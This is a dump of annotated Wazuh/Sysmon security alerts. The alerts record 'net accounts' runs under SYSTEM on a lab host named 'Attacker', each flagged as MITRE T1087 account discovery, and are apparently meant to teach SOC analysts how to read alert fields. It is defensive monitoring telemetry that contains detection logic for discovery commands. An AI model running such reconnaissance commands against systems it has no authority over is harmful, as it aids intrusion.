data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.107+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.107+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2163095
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:56.6411308Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288443
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:56.629 ProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00} ProcessId: 9628 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:56.629
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be34-680a-ff0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9628
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.122+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.122+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2168328
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.1756159Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288447
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.169 ProcessGuid: {94294ddc-be35-680a-020c-000000000e00} ProcessId: 17256 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be34-680a-ff0b-000000000e00} ParentProcessId: 9628 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.169
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-020c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17256
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be34-680a-ff0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9628
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.155+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.155+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2173383
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.2713241Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288452
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.264 ProcessGuid: {94294ddc-be35-680a-030c-000000000e00} ProcessId: 10832 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.264
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-030c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:59.188+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:59.188+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534519.2178620
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:57.3746343Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288454
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:57.369 ProcessGuid: {94294ddc-be35-680a-050c-000000000e00} ProcessId: 11376 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be35-680a-030c-000000000e00} ParentProcessId: 10832 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:57.369
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be35-680a-050c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11376
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
